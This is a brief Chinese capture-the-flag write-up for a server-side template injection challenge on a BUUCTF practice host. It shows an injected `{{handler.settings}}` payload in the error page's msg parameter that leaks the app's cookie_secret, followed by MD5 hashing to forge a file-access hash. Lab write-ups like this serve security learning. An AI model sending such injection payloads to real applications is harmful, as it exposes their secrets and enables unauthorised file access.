- 考察点:服务端模板注入(ssti攻击)
打开存在三个文件

查看flag.txt ,flag所在文件/flllllllllllag,文件名+filehash都到文件

welcome.txt中存在render
render为python渲染函数
https://cn.vuejs.org/v2/guide/render-function.html
hint文件中提示filehash为cookie_secret+md5的filename组成

filename改为fllllllllllg时报错error页面存在模板注入

找到cookie_secret
http://21f57b78-60e0-4b5d-9a1c-adc9e1e8505c.node3.buuoj.cn/error?msg={{handler.settings}}

md5加密
print(hashlib.md5(b'/fllllllllllllag').hexdigest())
print(hashlib.md5(b'cb86f54f-3513-4eae-b6fb-587d2e82082e3bf9f6cf685a6dd8defadabfb41a03a1').hexdigest())

网友评论